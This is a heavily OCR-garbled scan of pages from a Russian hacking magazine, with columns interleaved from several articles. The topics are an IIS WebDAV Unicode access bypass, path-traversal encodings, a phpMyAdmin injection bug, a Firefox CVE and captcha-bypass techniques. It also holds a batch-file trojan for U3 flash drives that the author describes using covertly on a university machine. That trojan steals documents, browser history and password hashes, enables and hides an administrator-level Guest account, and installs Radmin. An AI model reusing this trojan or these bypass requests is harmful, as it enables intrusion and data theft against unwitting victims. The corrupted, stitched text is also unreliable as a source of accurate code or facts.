форм линейки "Windows 5erver". WebDAV расш"ряет НТТРследующими
Видно, ЧТО В URI мы вставили символ «/» [%cO%af), который будет удален из WebDav-запроса. Вторая строка указываетWЕВ-серверу на то, цто
командами:
запрос следует обрабатывать с помощью средств
PROPFIND X!1L. Также
получение свойств объекта на сервере в формате МОЖНО получать
структуру
релозитория
МКСОL
изменение свойств за одну транзакцию
создать коплекцию объектов
-
(каталог в случае до
ступа к файлам) сору
-
MOVE LOCK -
URI
то же, что и предыдущая,
Conneotion: close
в другой
только перемещение
поставить блокировку на объекте.
вает эксклюзивные
GET /sec%cO%afret/seoret. zip HTTP/l.l
Trarlslate: f
Host: secrethost.ru
копирование из одного
UNLOCK -
Мы можем
(дерево
катапогов)
PROPPATCH -
WebDav.
комбинировать" послать нечто вроде:
и общие
(shared)
WebDAV
поддержи
бпокировки
C'blTb блокирсвку С ресурса
в отчетпридетсодержимоезащищенногообъекта. даже если дирек тория. в которой он располагался,была защищенапаролем. Можноли сделать что-либо еще? Смотри описание запроса PROPFIND
- с ним
можно получ"ть структуру какой-либо папки. Если учесть, что, ИСГIОЛЬ
эуя U NICODE, мы можем обходить весомые ограничения безопаснос Все эти команды являютсядополнительнымиметодами взаимодействия
ти,
с WEB-сервером.Узнать более подробно об зтих и основныхзапросах
PRQPFIN О [msdnm icrosoft.co Пl/еП-ll sfliЬгагуfаа1429601 ЕХС HG65i.
-
почему бы не применить это для л"стинга каталогов на сервере?
LocktooL,mspx), IIS lockdown lool- утилита от Microsoft. позволяющаялегко и быстро переключить веб-сервер [115 4,0 или 5,0) в режим. когда работа юттол ько
КОМ.J.LИЛИИ СППОЙТ
те сервисы, которые хочет предоставить администратор сервера. а все
#
другие отключены, Такой подход может стать временным устранением
Чтобы побеДИТЬУЯЗ8ИМОСТЬ, воспользуйся патчем из GIT [С!it.kегпеl о r9no~li п ux/ke гпе 1/9 i t/torva lds/li п u х- 2.6,9 il· а=Ь 10 bd iff· f=ke гп el/pt га се. с '
Приведеннаявыше функция взята из файла lауоut/gепегiсl
проверяет, не равен ли texlrun NULL (3500). СНИl-\ает хуке фрейма и Г1роверяет. присутствует ли textrun в кэше, Если да, то удаляетего из кеша, а затем удаляети сам объект, 3акомментированныйучасток кода
О3
MOZILLA FIREFOX
MEMORY
CORRUPTION
также содержитошибки. Ошибка в том, что mTextRurJ может содержать некорректные флаги от предыдущих операций,
- это при ведет к некор
ректн о му удален ию [3519) Из-за подобн ых соображе н v\и разработч ики
иrmi
MOZilla позднее ввели новуюдополнительную константу:
Брешь обнаружили Маге Gueuгy и DаПlеl Veditz, после чего та была офи
циально опубли кована в базе CVE ICVE-2009-1313), Касается она крзwа
+
браузера путем ЭКСГ1луатации ГcJП5ТехtFгаmе:,СlеагТехtRuпl),
• ph р myad m i Il.5VIl.SO U('cefo 1'9 е. net/viewvc/ph gmyad m i n ?viеw-геv& гevis iоп~12З48.
РАСКРЫТИЕ ПУТЕЙ
05 ~fti:t~1:~~~~~~~~~1
ОГРОМНЫЙ СПИСОК УЯЗВИМОПЕЙ JOMMLA, ЛЬВИНАЯ ДОЛЯ КОТО
РЫХ СОДЕРЖИТСЯ В КОМ ПОНЕНТАХ. ВСЕ ЭТО ИМЕЕТ НА СВОЕМ БОРТУ JOOM5CAN ДЛЯ ПРОВЕРОК
BZERVIТ
WEBSERVER 4.0
fmШj. КлассифИК<JЦИЯ подобной атаки -
Directory Traveгsal. В литературе и сов
ременныхсистемах классификациивектор атаки казывают Path Traversal. Сам ый большой риск, KOTOpbl й она влечет за собой, CKpЫ8aeTC~ не только
в листинге директорий, но и в обходе ACL -листов. Эта техн ика ата к направлена на получениедоступа кфайлам,директориями командам, находящимс~вне основнойдиректорииWeb-сервера.Злоумышленник
может манипулироватьпара метрами URLc целью получениядоступа
пол ЬЗО8ателя оп ределенной частью файловой системы, обычно называе
Итак, функция getConflgFILe[1 В03враЩ<Jет всякого рода информацию
мой «web docuгnent гoot» или "CGI гоо!}). Эти директории содержат файлы,
Здесь составляется конфигурационный файл. и $гet инклудит РН Р
предназначенныедля пользователя, и программы, необходимыедля
код. На 281 строке мы видим комментарий, а затем еще один
U* Seгver:
получения доступа к фун кциям Web-приложения. Большинство базовых
«id» */1. Обрати внимание: выходиттак, что $id полностью
атак, эксплуатирующих обратный путь, основаны на внедрении в
контролируется пользователем сразу, К<JКТОЛЬКО переменная была получена
символов " ../}) - для того, чтобы изменить расположение ресурса, который
URL
из сессии [267J. Скажем, если пользователь передаст ее установленной в
будет обрабатываться сервером. Посколькубольши нство Web-серверов
виде "bLeh */ /*», то тем самым он завершит конфигу
фильтруют эту последовательность, злоумышленник может воспользо
рационный файл строкой «/* Seгver: bleh
*/
dateO:?> /* */».
ваться альтернативн ыми кодировками, например, Uпiсоdе [" ..%u2216» или «.. %cO%af,,!. Другие популярные приемы - использование обратного слеша k.\») в WlПdоws-серверах,символов URLEncode 1«%2e%2e%2f})1
овиш
или двойная кодировка URLEncode k.%255c»J.
phpMyAdmin 3.х [до 3.1.3.2.]
Даже если Web-серверограничиваетдоступ кфайлам определенным К<Jталогом, эта уязвимость может возникать в сценариях или
CGI-npo
$1fiфfflfii
граммах Воэможностьиспользованияобратного пути в каталогах
Требуется огра н ич ить передаваемы е A<J н н ые с помощью pregJeplace!J:
довольно часто возникает в приложениях,использующихмеханизмы
шаблонов или загружающихтекст страниц из файлов на сервере. В этом
foreach ($с l' Sелтегs' ] as $id => $server) ( + $k = preg_replace(' / [AA-Zа-zО-9_]/', '_', $k);
$ret .= '/* Server: ' . [$id] */' . $crlf
$this->gеtSегvеГNаmе($id)
варианте атаки злоумышленникмодифицируетимя файла, передавае
мое в качестве пара метра CGI-програММbIили серверногосценария. В реэультатеОН может получить исходный код сценариев. Нередко к имени
запрашиваемогофайла добавляютсяспециальныесимволы, такие хак
"%00,,, с целью обхода фильтров. Бывает, что при эксплуатациитакого и применить офИЦИ<JЛЬНО 8ышедшие обновления.
рода уязвимостейв ответ на их популяРНОСТЬ при меня ются IDS-систе
мы, которыеурезаютзапросы с «хождением»ПО каталогам ["/../../../»]
УСПЕШНЫЙ ОБХОД И ПРОВЕДЕНИЕАТАКИ «DIRECТORYTRAYERSAL» .~'
вариациоfНiOЙrлубины. Требуется помнить, что кроме стандартного
символа мы можем использовать, к примеру," .\. раЗН08ИДНОСТИ
ВЗЛОМ САРТСНА-ФИЛЬТРОВ Фил ьтры c_aptcha получ ил и широкое расп ространен ие и повсемест но используются в многочисленных интернет-сервисах. Но не все
сарtсhа-фильтры одинаковы полезны. Многие из существующих реа лизаций себя не оправдывают, а лишь раздражают своим присутстви
ем обычных пользователей. О недостатках применения сарtсhа-филь тров и поидет речь
•
.
САРТСНА (Сот pletely Auto та ted PlJblic Т uri ng
интеллекта и философии, а в наше время еще
Условно все способы можно разделить на
test to tell Computers and Humans Apart, в про
и нашла применениев борьбе с а8томатизи
уязвимости в реализации и фундаментальные
стонародье - «капча»I- полностью автомати
рованным программнымобеспечением
недостатки самой концепции применения
зированный публичный тест Т ьюринга для оп
В наиболее распространенномварианте
сарtсhа-фильтров. К уязвимостям реализации
ределения компьютеров и людей, В основном
испол ьзова н и я са ptcha- фильтров требуется
относятся следующие распространенные
используется, когда необходимо предотвратить
ввести символы, как правило, изображен
проблемы
выполнение каких-либо автоматизированных
ные на предлагаемом рисунке в искаженном
I,А8томатизированноераспознавание.Ав
действий в отнашении инт~рнет-сервисов,
виде и обычно - сдобавлением некоторого
томатизированное
8
«шума». Могут также применяться другие
задача OCR (оптическое распознавание сим
ческих отправок сообщ~ний, регистраций,
ПЛОХО алгоритмизуемые задачи, основанные
воловl- зто одна из самых острых проблем
проведения атак типа подбор пароля и т.п.
на логике мышления человека, например:
применения captcha-фИЛЬТР08.Дело втом,
Понятие Теста Тыоринга было введено Аланом
указать, что изображено на картинке; ввести
что во многих случаях существуетвозмож
М. Т ьюрингом
все символы, которые соприкасаются с чем-то
ность автоматизированного
(вспоминай кошек на rapldsharel и пр. Как
текста, нанесенного на изображение. Тотже
лить, обладает ли компьютерная программа
альтернативз картинкам могут применяться
Adobe Fine Rеаdегс успехом может распоз
интеллектаl'" или, точнее, может ли она вы
капчи, основанные на распознаванииречи.
на8ать слабые реализации captcha [смотри
давать себя за человека. Критерий Тыоринга
Встречаютсятакже капчи, где предлагается
скриншотыl. Различного рода искажения с
описан в виде игры "Имитация». Берется
ввести ответ на простое арифметическое
добавлением шумов на изображение способ
один мужчина. одна женщина и программа,
деikтвие (90 + 72 =
частности, для предотвращения автомати
[1912-19541 в работе "Игра в
имитацию». Задача та кого теста
-
опреде
которая, не Иf~ея информации о половой при Н'адлежности участн иков, задает им вопросы.
Ее цель
- определить ПОЛ людей. Несмотря
?I.
распознавание
капчи или
распозна взния
ны лишь с некоторым лроцентом успешности
воспрепятствовать этому. Ведь чем более ис
ПРАКТИКА ОБХОДА
CApteHA-ФИЛЫРО8
кажена информация на изображении дЛЯ 8ВО да, тем больше проблем возникает у конечного
на критику этой теории, она внесла большой
Сегодня ИЗ8естно достаточно много способов
пользователя. Разработчикам фильтров при
вклад в развитие систем искусственного
обхода различного рода сарtсhа-фильтров
ходится находить некий компромисс между
~
054
ХАКЕР
06 /1261 09
>> 6::лоtv1
около
20 секунд
В подобныхусловиях на
твердую «четверку» мог отработать вектор по
макси мальным
искажеl-iием
перебору паролей к аккаунтам исследуемой
Или более простой случай -
системы .. если бы не одно «НО». Ограничения
I-ie используются
проекта САРТСНА ПОЗl-iавать более использовании
Killer не
20
позволяют рас
одного аккаунта в их системе.
-
если ДЛА картинок
раЗЛИЧI-iОГО рода искажения
и добавление шума Тогда просто сверяются
изображений в сутки при
Ключевое слово тут
Иl-iформации и
капчу осуществляется путем сравнения степе ни похожести с имеющимися экземплярами.
«одного». На сайте про
контрольные суммы, и становится поНятно, с каким паРНОКОПЫТI-iЫМ
3. Уязвимости
мы имеем дело.
при передаче значения капчи
екта существует баг, позволяющий регистри
в брауэер пользователя_ Какустанавлива
ровать неограl-iиченное количество пользова
ется соответствие междузначением капчи и
приемлемое количество попыток.
телей. При всем уважении к проекту (на сайте
генерируемой картинкой? Многие разработчики
На фоне подобного l-iеАОСтатка появилось
даже было замечено использование защиты
сарtсhа-фильтров почему-то полагают, что
несколько проектов по практическойде
от
монстрациизадач
поводу разработки стойкой капчи, а просто
лучше передавать в браузер пользователя эави
просят при регистрации
симоезначение от генерируемой капчи (хеш от
способностьюпользова теля прочитать и ввести значеl-iие за
тные ю них Visiоп Group,
это
OCR. Наиболее извес UC Berkeley Computer
PWNtcha
и САРТСНА
Klller.
CSRF)
авторы не стали заморачиваться по
нового пользователя
сложить два числа, которые попадают в сырой
генери руемого значен ияl. И впоследствии осу
Ваш ПОКОРI-iЫЙ слуга, выполняя пентест
HTML-KOA. ДЛЯ
OAI-iОГО банковскогоwеЬ-приложения,
лишь самого вектора, ноты '10жешь восполь
порой передача осуществляется G виде откры
зоваться этим недостатком,
того текста [то есть Зl-iачение капчи передается,
ВОЗМОЖI-iОСТЬ
познакомиться
имел
с последним
более близко.
,юик целей достаточно было
вместо некоторого Bl-iутреннего идентификатора
пра вда, думаю,
баг довольно быстро прикроют
Проект САРТСНА
Killer заинтересовал,
пре
ществлять проверку по зтому значению. Приче'1,
например, какзначение скрытого параметра
Чтобы убедиться в эффективности
OCR
фОР'1 ы! или существует ВОЗМОЖI-iОСТЬ обратимого
в по
жде всего, тем, что работа с ним основана
левых УСЛОВИАХ, Я провел небольшое исследо
шифрования передаваемого значения.
на использовании
вание в отношении таких сервисов, как Уапdех
Иногда реализуемы и более изощренные
API,
и есть возможность
легкого встраивания функции по автомати
зированному взлону капчи в собственные
приложеl-iИЯ. На РНР это выглядит ПрИ'1ер
но та кс
«ПРОЕIКТ САРТСНА IKI LLER ЗАИ НТЕРЕСО ВАЛ ТЕМ, ЧТО РАБОТА С НИМ ОСНОВАНА
Надежностьлюбойсистемы безопасности в значительной
РWNt<jш
случай, но с учетом повсеместных уязвимостей типа
степени зависит от качества ее реализации. У практи
• captchakiller.com
ческ!'!х решений есть свои недостатки. которые могут
• !2.~с_u.гitуlаЬ.г_ш'
обхода ВВОАа капчи Другое дело, будет ли зто 80стре
быть использованы злоумышленниками В полной мере
соп test!239642,phQ.
бованным в случае, когда приложен!'!е содержит такие
это правило применимо и к системам, использующим
грубые ошибк!'!.
САРТСНА. Поэтому Ааже в очень правильной реализации
К ФУI<Ааментальным проблемам использования captcl1a
сарtсhа-фильтра испольЗован!'!е только его ОАНОГО может
фильтров ОТНОСИТСЯ воэможность использоваНИА челове
быть недостаточно. Хорошей практ!'!кой является в до·
SOL
IПJесtiоп данный вектор более чем применим Аля
ческого ресурса для распознавания капчи ["меТОАлем
полнение к капче использовать!'! Аругие механизмы, за
мингов"j. Это замечательный!'!очень эффективный вектор
трудняющие автоматизи рованн ые Аействия, На пример,
обхода сарtсl1а-фильтров, которым с момента широкого
могут испольэоваться различные временные задержки
распространенияэтой технолог!'!!'! С успехом ПОЛЬЗУЮТСЯ
при выполнеНИL1 множеСТ8а ОАНОТИПНЫХ дайствий за
спамеры всего мира и который ставит ПОА сомнение само
короткое время, запрос, какой-пибо информации, изеест·
пр!'!менен!'!е сарtсhа-фильтров.
~IОЙ пишь авторизованному пользоватепю L1 др,
ХАКЕР
06 /126/
О9
:::r.:::
~
057
!
'-=:-> ~з ..... О_М
~
058
Езлоt·.-1
Однажды вечером я сидел дома. почитывая
КiпgSlоп, в задачи которого входила
за кружкой кофе очередной номер журнала
прошивка моей флешки дл~ совместимости
"хакер", и вдруг наткнулс~ на статью про
С
попытки взлома U3-флешки и софта под нее.
самое интересное
Vlsta
nepe
И именно с его изучеНИR началось
тая. И простор для хакерской деятельности
ПОДАРОК ХАКЕРУ ПАТЧ ОТ РАЗРАБОТЧИКА
на ней просто безграничен. Уже через день ~
Итак, у нас есть неизвестное приложение.
npocTaR.
а буквально золо
и пустой рабочей части Как прин~то в ком пании Кlngstоп. все должно быть доступно дл~ взлома, а это значило, что уже через
1О минут ковыряния в блокноте я создал
CTaTb~ меня сильно заинтересовала тем, что флешка была не
диска, пустой перегородк., между дисками
корректный файл автозапуска для защищен
ного диска. Он наnравл~л выполнение кода сначала на мой обработчик, а затем уже на
приступил к опытам и изучению этого инте
При запуске оно опрашивает носитель,
файлы LаLJПсhU3-0бработчика итакдалее.
ресне~шего оборудования. Как оказалось. в
копирует данные с него к нам в комп. а после
Теперь пора поговорить
caHO~ системе таких флешек существовала
перепрошивки возвращает все по местам.
исполняемом коде, определить концеп
уязвимость, которая потенциально позволя
Сопровождается этот праздник жизни
ции развития и общую структуру постро
ла взломщику сделать инъект в содержимое
всевоз~r.ожными глюками и красивыми
ени~
защище~IНОГО раздела флешки и заставить
окошками, которые просто инезатейливо
систе~~ы я выбрал командную строку
информируют юзера, что ему следует делать
WlпЗ2 Сделал я это по целому p~дy при
это содержимое ИСПОЛНЯТЬСR
на ко;r.пьютере
05 обработчике и
В качестве языка для написания
жертвы. К слову сказать, Большо~ Браттоже
дальше. Пристальное внимание Я обратил
чин, в числе которых
не спит, поэтому все флешки такого типа
на сам исполн~емый файл. Он заставил
ния этого языка и легковесность готовых
перестали попадать к нам на прилавки уже
меня улыбнуться. ЭТО незащищенное
исполняемых Ьаt-файлов_
через
Wlnгаг-приложение, имеющее тип саморас
2 недели
Сейчас их нет ни в одном
- npocToTa
изуче
НЕПРИСТОЙ~НЫЕ ЗАПРОСЫ
магазине города. Но заказатьтако~ U3-шный
паковывающегося архива, в котором было
флеш-диск на
необычное содержимое. Весь взлом состоял
КОМАНДНОИ СТРОКИ
nроблемi
в распакоаке и правке нужных Iпi-файлов
Прежде чем мы полезем вдебри, давай расоr.отрим
ПОРЫ8ШИСЬ в Сети, я не нашел никаких
блокнотом Чем дальше ~ изучал их систему
основные приколы командного языка и методы об
постов по этой теме и начал сам ковырять
обновлений, тем больше мне зто напоми
хода тех или иных ограничений. Первая проблема,
флешку, а именно
нало приколы из серии «почувствуй себя
которая долгосотрясала мой мозг - это обращение
/" гига в инете нет никаких
-
пробовал ее скопиро
вать, разбить, переформатировать, юменить
кул-хакером". В архиве лежали интерфейс
к русско~зычным ПУТRМ В проводнике из пакетного
загрузочную область ... В итоге, все мои
обновл~лки,функционал.которыЙполучал
файла. Если, допустим, с консоли ввести
попытки были обречены на провал, пока
доступ кзащищенномудиску и isо-обра
мне в руки не попал замечательный nатч от
зы
ХАКЕР
06 /126/ 09
-
соответственно, для защищенного
~
059
»
@lf «%pr%»==»disconecCed» @star·t calc&&pause -
то на диске действительно создастся указанная выше
@goco
т1
папка, но в нашем случае нужен пакетный файл Сле довательно, вместо желаемого результата. мы получим
в этом коде используютсяпоисковые запросы, выпол
какую-то кракозябру на неизвестном языке Но все будет
ненные в кириллическихсимволах Они всенепременно
прекрасно работать, еслиты пропишешь кодировку
1251
исказятся в какую-то вну'Греннюю кодировку комаНДIЮЙ
строки Чтобы это обойти. выдели нужное тебе слово
~
links
• Это адреса интер
chcp 1251
ДМI поиска в окне командной строки исполняющегося
тд С: \аДНИНИС'l'ратор\
пакетного файла правой кнопкой мыши и вставь в блок
НОТ. Это может быть буква. строка и прочие символы,
нет-магазинов, где
продаются подобные
Скажупару слов об использованиивывода строки в своих це
за исключениемуправляющихсимволов ко;~андной
флешки. Есть экземп
Л>JХ допустим,ты работаешь с окном командной строки, и тебе
строки вроде скобок. Но даже в этом случае ты можешь
ляры на
надо получитьчисло из ответа Ko,~aHДЫ. Попробуем написать
использоватьсинтаКОIС циклов FOR, которым наплевать
1,2,4 и вроде
быдаже на
16 гиговl
• пlt.JV
" digilec.ru "lliobiloff.net • А на iхЫ.согл(
программу,ко'Горая мониторитсвязьскомпьютеромпо сети и в
на содержи,~ое
случае обрыва что-нибудьвыполнит:
заранее заготовленные спецсимволы из
их переменных,
Ка к при мер, ищи на
rem
програмна опрашивает заранее известный
файла.
Apyroro
мою систему пересоздаНИI1
плейлистов, для построения которых мне необходимо
сервер И результаты пинга связывает с датой и
польэоваться
временем
принципе!
storag~(flashd rives
OVO
или просто скопирова'Гь
тем, что командная
строка не пере носит в
Также, из-за чрезмерной обширности вопроса, могу
р17.shtглl, проиаво
rem #
дился интересный
@эес саrgеt=194.67.57.2б
укажите сервер
лишь упомянуть о возможности
режиме ожидания окончания
запуска скриптов
предыдущего,
как в
так и в мно
тест-обзор флешек, в
chcp 1251
гопоточном режиме. Не'Г никаких проблем написания
числе кО"Горых оказа
co1or fD
таких программ, которые при ВЫПОЛliении
лась и из.
t. i t 1 е
вали бы свое потомство, притом, далеко не по линейны,~
Блокнотик
программиро
chcp 866
алгоритмам
:т1
и прочими полеаными вкусностями. Даже базу данных
Нет проблем и с математикой, матрица"tи
состряпать в ней можно без труда, хотя не без I-еморроя.
@set
Всегда К твоим услугам справка
рг=уаr,п=l,б
@for /F' "usebackq Cokens=l. 2. З, 4,5.6,7*
delims= " %%1 IN ('ping %Carget% DO (echo %%4 %%5 set
рr=%%б) &
%%61 findstr
%%6Ifiпdstг
-п 1')
'уа(,п=»&&@
Windows по KOMaHiJHov,
строке и моя почта. )'1 будутолько рад вопросам, потому что хочу расширить доступный мне функционал коман д~ой строки ее же средствами. Считаю использование
файла, который поступил от приложения С защищенного
@rem
#@есЬо
@есЬо
~
060
%d_t 9o »
с: \геа1 tiюе_lоg.
txt
%d_t%
- вызов на исполнение защищенного
раздела. Сначала мы определим букву диска. на который подключилась наша флешка, и откуда ей суждено рабо
IF'bI
@гет #в случае обрыва по умолчани.ю запускает
тать.)'I сделал Э'ГО, используя обычные
калькулятор
пара метром в пакетный файл. наход~щийся ~a основном
и передал их
ХАКЕР
06 /126/ 09
•
>> в::лоt""1
80ТТАКЯ КОГДА-ТО ПИСАЛ RАR-ТРОЯНА разделе диска "JUMPER,8AT », В нем я определил режим работы и тактику поведения. Соответственно,Я могу или вызвать атакующий модуль, или же, например, открыть
ГЛIOКIJ. Е:ЫЯЕ:л€'нные
реж>\м хозя>\на-владельцафлешки, в котором играет
Ti?(:TIJp OE:aHUi?tv:I
музыка, запускается аська и коп>\руютсяЛОГИ со взло
Изначально система писалась под WindowsXP Ноте,
манных машин прямо на мой рабоч>\й стол! Допустим, что
но после ее тест>\рования на WiпdоwsХР Рго выяв>\лись
флешка попала влапы негодяя Предлагаю расо,отреть
некоторые глюки Напр>\мер, система долго и исправно
лишь некоторые моменты файла "WARBOTbat», напр>\
работала на всех компах, пока со мной и "'10>\"'1 товарищем
мер, его начальные настройки:
исключительнос целью
днем нам вы пала возможн ость попасть в другой корпус
set make_tir_in_allusers_autorun=l -
POAHOI'O университета
вать ли Трояна в а.втозагрузке
и получить доступ к компьютеру,
через который так или иначе проходят все методички,
телей
созда
всех пользова
set make_tir_in_user_autorun=l -
бы неплохо навар>\ться. Пр>\дя в корпус, Я передал при
ли Трояна в автозагрузке текущего лользо:вате
ятелю флешку, после чего мы пошли «на дело» Сначала
ля
меня. как сейчас помню, He~'HOГO озадачила надпись
set stealth_konsol=O -
Windows2000 на з кране мон итора, но уже через м гнове
пьютера жеР'ЕВЫ файлы консопей управления?
(0\1)
set stealth_histiry_ie=l -
>\ Р.. недолго ду~,ая, 8руб>\л принуд>\тельную атаку, Время
,"орию посещения 6раузера ТЕ?
шло, флешка работала, а мы выполняли собственно то,
set attack_for_guest=l -
зачем нас направили в зтототдел. После окончаниР.
на гостя?
работы мы с нетерпен>\ем вернул>\сь в родные корпуса
set stealth recents=l -
(0\1)
производить ли атаку
На дискетебяожидает
(0\1)
копировать ли ярлыки
О да I Флешка сработала чудесно! По сещ МЫ прон>\кли в
недавно ОТКрЫТЫХ документов?
ет «осмотреться»)
лись В действительно интересные фотографи>\ сотрудн>\ц
set stealth_system_info=l -
отдела. И так продолжалось до самого обрыва связи. «Ну,
лаги
>\
ных?
со
счетчиков
{иногда ПОНQга
(0\1)
системы и
значения
аспектов разработки подобныхприложе
(0\1)
няли по тревоге
скопировать мд5-хеши паролей с системы?
set type_of_file_for_stealth=.doc . txt
подключились к вузовской сети и стали пытаться зайти на
указывает файлы,
тот компьютер НаС>Кдал облом
ны с компьютера на флешку
(О
\1)
которые ДОЛЖНЫ быть сграбле
под WiпЗ2 и прочие вкусности.описанные
в статье Тебе остается лишь взять и УЛОЖVlть
но не отвечал. Сильно озадаченные ~Ш пошли в другой
set type_of_file_for_filtration=.lnk .LnK
корпус
.lnp3
Придя, ~Ш наблюдали следующую картину. компьютер,
.mpeg .mpg .cda %usbdisc% winword WINWORD
.уоЬ
НИЙ,скриптован>\я
nЫ'Т'аться ли
чтобы подправ>\ть какие-то поля. ПОЧуЯ8 неладное. мы
.WПlа
а также все необхо
касающиеся всех
перемен
set steal th_md5--I>asswords=1 -
- компьютер п>\нговался.
моя "ега-сVlстема,
димые материалы,
копировать ли
мы пошли подомам. На следующееутро моего друга под
- надо было срочно явиться в l'ОТ отдел,
твенност>\не несутl
копировать ли ис
одну из самых защищенных ~ышин и с кайфом БГлядыва
сказал Я товарищу,
создавать
копировать ли с КОМ
гнезде USB, Флешка не захотела атаковать компьютер,
-
автор, н и редакц",яза
(0\1)
ние флешка весело и бодро м>\гала своей лампочкой В
завтра все скоп>\руем»,
ознакомления/Ни
твои действияответе
(0\1)
дипломные работы и вкусности, на которых можно было
-
warning
Вни~,ан>\е! Инфор мацVlЯ представлена
не случилась следующая история Однажды майским
ничего
~
.wav .mid .midi
.тр4
. avi .ogg
предоставленныйма териал по папочкам.
возле него несколько человек. Они смотрел>\ на нас
глазами маньяков. которые давно никого неубивали. На 8се последующие 80ПрОСЫ мы сделали лица кирп>\чом и стали нести ну просто полную ах"нею про интернет, его
.&.
CPO'iHO
Е: HOMi?p!
раЗ8итие и вирусы Нас выслушали и поверил",. Когда
(
мы спросили, а что же случилось, нам рассказали, что
Совсем недавно стало известно, что можно сделать чу
умашины внезапно слетели все пароли. Они вызвали
до-флешку из любого накоп>\теля, Теперь не обязатель
местного сисад~,ина, который добрых три часа возился с
но по купать дорогую UЗ-флешку - сойдет даже трЗ
таблич~ой ввода пароля, и. видимо, совсем отчаявш",сь,
плеерl Универсальный софт для ~ЮДVlфикации флешек,
наугад ввел ",мя пользователя "Гость» И нажал
загруженный с сайта liltp:l/flashhoot.ru/irrdex.php?nam
«Enter»
Система неожиданнопорадовала его не тол ько успеш ным входом, но
>\ админск",ми
Вонакие пирог>\.
ХАКЕР 06 11261 09
полномочиями в пр",дачу.
e~Files&op=cat&id=6&раgепum=2,я заботливозалил на диск. Как его юзать -
Отдельно хотелось бы рассказать об атаке на гостя, которая является гвоздем нашей про граммы:
создд..ЕМ ГЛОБАЛЬНЫЕ ПЕРЕМЕННЫЕДЛЯ РАБОТЫ НАШЕИ ФЛЕШКИ
if %attack_for_9uest%==O goto тЗ - искпючающее chcp 1251 - подключим кодировку для кириллицы пеt
Cookies cookies .jpeg .jpg
.Ьmр
.gif .pic .pict .ico
uSer
гость
/ act ive
:уеэ
-
ИЛИ
активируем учетную запись
гас'Т'Я
фильтры! ч:тобы не перегрузи'Тъ флешку ВСЯКИМ хламом
rem #.jpeg .jpg .Ьmр .gif .pic .pict . ico .gif .html .htm - другой набор фильтров под другие задачи set find_evristic_analyze_in_file_types:l ли искусственный интеллект для типов фаилов
set
?
к
структуре
тн
localgroup
равным
аДViинистраторы гость /адб
администратору по
-
сделаем гос
правам
включить (О
\
1)
find_evristic_analyze~in_file_folders=l - дать ли
искусственном.}' интелпе.к'I'У доступ
пеt.
ПdПОК?
(0\1 )
@reg add Wiпdо,,,s
«ИКЕУ_LОСАL_МАСНINЕ\SОFТWАRЕ\МiсгоsоЕt\
NT\CllrrentVers iоп\Wiпlоgоп\SресiаlАССОllлts\
UserList» /v
гость
/t reg_dword
/д О /Е
-
скроем появив
шуюся учетку с ГЛdЗ долой от юзера
set recent_folder_for_analyze=%homedrive%%homepath%\
Recent\
net user
set no_find_documents=O -
1234 -
приправим паролем ло вкусу
ОБ УДОБСТВАХ НЕ ЗАБЫВАЕМ
менты вообще?
set no_copy_all_documents=O -
вообще rтpопускаТh копи
Ну, хорошо, МЫ в какой-то степени удовлетворили наши заllрОСЫ по
рование каких-либо документов?
взлому, НО помимо всего прочего, моя система обладает массой прият
set not_attacking=O set no_use_radmin=O -
не а'rаКОБат,,?
ных феliечек и фишек, таких, как автоматизированный вход в аську. На
мне нельзя устанавливать раД~fИ1-f
диске ты слегкостью должен найти файл
тронна в целевую систему?
~
гость
мне не искать текстовые доку
062
«pqp bat".
Именно он управл~етвводом пароля ЭтотскриП1" 11росматриваетсвое ХДКЕ Р
06 /126/ 09
rli8lll
~
»
Е:3ЛОМ
, Стэндзрт uз fp}ll1n't
~USВ
• 90ttтаНО&Л8ние даННI неисправ:ных носитеП81
Flasl1 DfNe Кlщ,tstоn»)
8: поаЙС-l1ис:те
·
в' кэтэпоге
В ОГ\\1с8нYl" не УlI:аэзн~,
скорость рвоoтыlБвB
r.педуlOШИЙ тоеар
Drlve,
прe..qъщущиЙ ТОtlзр
• Как
ДОUOlВШь. В cp'tBWeHIlt:; О ораtМИТIo
F'
на какой скорос-п
работает?
, Мn" ~oo.
I
СП'1:.~~_[~~~Р~I)
!
"делать
USB Flas!
эзrруэочныM
• ФrI'JWХВ ДOI"DКHa ЖНТЬ ';
AfI~ О'ТlAtи ... Cp ... MIНltA
версll.Я для пе:Ч3JJ1
' АРJIIКУЛ: ?t-l450-1 НllПllЧllе H.J. скn.ще: В Д(1ННЫЙ 1,IOI,teHT Q1cyrCIByer. ПосrynлеНllЯ в ЛI'ОДt)ЖУ H~ t)".t!11Д.)~I~~R.
1i ООСI.IО1ЕННЬ
пос:педнюю цеку
r::--------------------~---·--------I ~~~ыe_.
..1.
Проиээодитеnь
Кiпgs!oп
Модель
DataTraveler .Ч~ ~~.~.~.~:~ 1Gb
US8
брелок с по.дцеРЖIОЙ технологии
U3 (You free)
ПОЭ90ПЯiOЩИИ эапускаtъ с Yt1PОКС1ВЗ проrрэммы Форм..-ra uз
Опнсанне
х'р.'ЗН:=t~е 91;8 денные H2Il1ash приводе и свободно переНQСИJ.ilые с однот ПКна дРуrоЙ.
ТИп харты ПВМАЩ
у'З.8
Обьем Flаsh-нsкопнтanя
1ГО
цсета иепoJlьэовэнныe в
...
Flosh Or1re.
Серебрнсты~.черный
оформлении Сро!( rарэнтнрозэнного )фанени~
До
данных
МЭkсимanьные _пе..;р_е..;.'Р.;.У3_·к_"
10 пет
1_00_0_G_П Р_".;.р_.о_о_re
..
_
lb.~IJ.-I!IIе~~~'lЬНОС111
ФЛЕШКА В МАГАЗИНЕ С НЕТЕРПЕНИЕМ ЖДЕТ СВОЕГО ПОКУПАТЕЛЯ
тело и последовательно осуществляет клавиатурный ввод односимволь
п ропи сать та м нужн ые идентифи каторы. 80Т список уже поддержи
ных комментариев в тексте про граммы. Если раскидать по этому файлу
ваем ых:
комментарии таким образом. БАSЕ
rem '!
DRVG
rem 1
GUARD
:r:el11 3
spy
rern 3
тет
По сути, это rл05зльные nepeMeHHble твоей операционной системы,
k
которые восстанавливаются при каждом входе в нее Пользуйся на
rem g rеПl
r
тещ
s
здоровье,
ОБСУДИМ ИТОГИ -
то на выходе мы получим пароль "V13Зkgгs». В итоге, пасс хранится
МЫ получили, своего рода платформу, которая будет отлично работать
в нестанда ртном виде и нетребует при вводе нашего участия.
не только на Т80ей машине, но и где-тотам, в чужой квартире, похищая
Следующая приятная фишка. если на флешке окажется места
нужные тебе данные, И неважно, кто ты, мой читатель,утебя всегда
мен ьше эаранее оп ределенного объема. то автоматически от
найдyrся вопросы и задачи, с которыми могла бы справитьсямоя система.
кроется утилита для удобного рассмотрения содержимого диска
